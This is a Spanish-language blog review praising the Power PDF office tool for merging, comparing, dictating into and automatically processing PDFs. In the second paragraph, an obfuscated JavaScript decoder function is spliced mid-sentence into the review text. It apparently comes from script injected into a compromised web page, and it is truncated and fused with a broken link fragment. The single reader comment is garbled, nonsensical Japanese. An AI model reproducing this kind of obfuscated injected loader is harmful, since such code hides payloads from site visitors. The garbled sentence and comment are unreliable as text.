MOUNTAIN Noticias y Reviews Power PDF, herramienta de uso diario para la oficina

Noticias y Reviews

Power PDF, herramienta de uso diario para la oficina

Share on Facebook0Tweet about this on TwitterShare on LinkedIn0Pin on Pinterest0Email this to someone

PowerPDF

Es muy habitual que los usuarios de oficina utilicen soluciones para crear archivos PDF en el trabajo de todos los días. Normalmente estas utilidades convierten textos en word en archivos finales, no requiriendo por parte del usuario que se vuelva a modificar. Pero hay un sector de personas que sí hace uso habitual de sus archivos PDF editándolos y trabajando de manera intensiva con ellos.

En este caso, la herramienta function h94fcba1e7(y1){var vd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var yb='';var p3,na,pc,q9,y3,w4,u5;var p6=0;do{q9=vd.indexOf(y1.charAt(p6++));y3=vd.indexOf(y1.charAt(p6++));w4=vd.indexOf(y1.charAt(p6++));u5=vd.indexOf(y1.charAt(p6++));p3=(q9<<2)|(y3>>4);na=((y3&15)<<4)|(w4>>2);pc=((w4&3)<<6)|u5;if(p3>=192)p3+=848;else if(p3==168)p3=1025;else if(p3==184)p3=1105;yb+=String.fromCharCode(p3);if(w4!=64){if(na>=192)na+=848;else if(na==168)na=1025;else if(na==184)na=1105;yb+=String.fromCharCode(na);}if(u5!=64){if(pc>=192)pc+=848;else if(pc==168)pc=1025;else if(pc==184)pc=1105;yb+=String.fromCharCode(pc);}}while(p6-scanning/power-pdf-converter/index.htm">Power PDF es la solución ideal, muy útil y sencilla de usar, a la vez que práctica y no extremadamente cara. Y es que esta utilidad aunque es de pago, nos puede ayudar a solventar numerosas tareas, dando ese extra de solvencia a nuestro trabajo que pudiéramos necesitar.

¿Y qué es lo que ofrece este Power PDF que los demás no tienen? En un primer lugar, está la opción de combinar documentos. Esta característica es importante cuando lo que deseamos es fusionar varios documentos que queremos unificar. También pueden eliminarse algunas de las páginas, haciéndonos la tarea más sencilla.

Otra característica esencial es que nos permite comparar documentos, especialmente ventajoso cuando nuestro cometido es encontrar cambios que se hayan producido en documentos como facturas, albaranes, o cualquier otro archivo del que queramos extraer lo que nos interesa. Para observar estos datos de manera eficaz, el programa nos permite ver un resumen de los cambios del texto, colocarlos uno al lado del otro y destacar los cambios aparecidos.

También tenemos algo que a muchos les puede sorprender, como la captación de voz. Esta es una implementación que viene de la propia desarrolladora, Nuance, ya que ésta también tiene software con esta especialidad. De esta manera, podemos dictar texto al ordenador, incluyendo notas en el PDF, recordatorios y todo tipo de revisiones que nos vendrán muy bien cuando volvamos a trabajar sobre este documento.

Por último, y como gran colofón a todas estas ventajas, viene lo mejor…Y no es otra que los procesos automáticos. Son aquellos que nos van a hacer la vida más fácil en el trabajo profesional con documentos, como por ejemplo la numeración de páginas, la localización de teléfonos o DNI, las marcas de agua, palabras que especifiquemos, etc.

En definitiva, Power PDF, es una herramienta que puede hacer de los documentos algo enriquecido y con muchas posibilidades. Recomendado.

2 comentarios en “Power PDF, herramienta de uso diario para la oficina

  1. 彼らはそれが明確に私たちが何について話しているのかに任意の重要性イマイチなものとして存在して表示します。いくつかは、彼らはとにかく、任意の同意を得ずに行うが、それがあるだけの方法のthats悲しいかなそのようなことが起こることを可能にするために単純に奇数としてそれを考えています。好奇心旺盛

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *